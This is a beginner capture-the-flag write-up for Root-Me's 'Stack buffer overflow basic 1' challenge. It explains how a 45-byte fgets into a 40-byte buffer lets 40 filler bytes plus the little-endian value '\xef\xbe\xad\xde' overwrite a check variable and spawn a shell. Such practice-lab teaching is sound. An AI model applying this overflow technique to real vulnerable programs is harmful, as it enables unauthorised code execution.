ELF x86 — Stack buffer overflow basic 1 Writeup— Rootme
This is the first challenge in the App-system category, which is PWN or binary exploitation. A fairly easy stack buffer overflow question.
ENVIRONMENT CONDITION
SOURCE CODE
Let us try analyzing the function. We can see buf[40]. This means it can hold a maximum of 40 characters. The fgets() takes in the input for buf, but the fgets() has a second parameter, which is the limit for the user input, which is 45. This means 5 extra characters can be given. Hmm?
That’s right! This is our place of attack.
Let’s further analyze our code. We can see “if condition” having some checks. The first condition is the (check != 0x04030201) && (check != 0xdeadbeef) . This means if we don’t get the answer, it prints “ You are on the right way .“, just tries to motivate us :)
The next is “if condition” check = 0xdeadbeef. This means we need the “check” variable to have this particular string! GOTCHA! but then how are we going to do this?
We use the buffer-overflow technique to fill up the buf[40], then we insert the 0xdeadbeef into check. The terminal snippet below will make it obvious.
I tried to spam a bunch of random characters. We can see the buf gets filled and the check variable is overwritten with the bunch of A’s too! ( 0x41414141 represents 4 A’s) . So if we are right, we give a bunch of random characters to fill up the buf, then we try to change the check variable. For this, I use python because sending 40 characters manually is boringggg.
This is to make sure we are on the right track . Anddddd….
YES, we are on the right track ! We sent 4 B’s after 40 A’s, this should have filled the buf. This overwrites the “check” variable.
Now what next ? Spoilers ?
We have to overwrite the “check” variable with deadbeef string. We have do this with the little-endian format.
The deadbeef in little-endian format is written as “\xef\xbe\xad\xde”. reversing 2 characters at a time from back.
Time to get to the climax!
We have to send a bunch of 40 random characters + “\xef\xbe\xad\xde”.
after sending this WE SHOULD HAVE GOT OUT FL…..
Wait? We don’t get it?
The shell gets closed automatically. Is there any way to pause the shell so that we can get the flag? We can use “cat” to pause our shell.
This should pause our shell. Now to make sure we use “whoami”. But where is our flag located? The instruction was given when we ssh into the machine. You didn’t read that yeah? it’s okay :)
So now we cat our flag out. I am going to leave this part to you. Try to get the flag yourself. Gotta be fair right? :)))))
I hope you understood the challenge! We shall meet in the next challenge.
Until then BYE .
